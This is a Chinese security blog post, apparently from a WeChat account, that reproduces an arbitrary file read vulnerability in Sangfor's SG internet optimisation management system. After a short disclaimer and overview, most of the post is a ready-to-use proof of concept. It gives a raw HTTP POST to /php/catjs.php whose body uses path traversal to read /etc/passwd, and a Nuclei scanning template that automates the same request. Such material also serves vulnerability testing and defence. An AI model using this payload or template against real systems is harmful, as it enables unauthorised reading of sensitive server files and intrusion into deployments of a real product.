【漏洞复现】深信服SG上网优化管理系统catjs.php任意文件读取漏洞 附POC

【漏洞复现】深信服SG上网优化管理系统catjs.php任意文件读取漏洞 附POC

YGnight night安全 2023-10-12 21:03

公众号新规
只对常读

星标的公众号才能展示大图推送,
建议大家把公众号“
n
i
g
h
t

全”设为












免责声明

night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!

漏洞概述

深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞,攻击者可利用该漏洞直接读取服务器敏感文件。

漏洞复现

POC:

POST /php/catjs.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 35
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
 
["../../../../../../../etc/passwd"]

NUCLEI POC

id: sangfor-sg-catjs-fileread
 
info:
  name: 深信服SG上网优化管理系统catjs.php任意文件读取漏洞
  author: YGnight
  severity: high
  description: description
  reference:
    - https://
  tags: tags
 
requests:
  - raw:
      - |-
        POST /php/catjs.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Length: 35
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
 
        ["../../../../../../../etc/passwd"]
 
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'root:'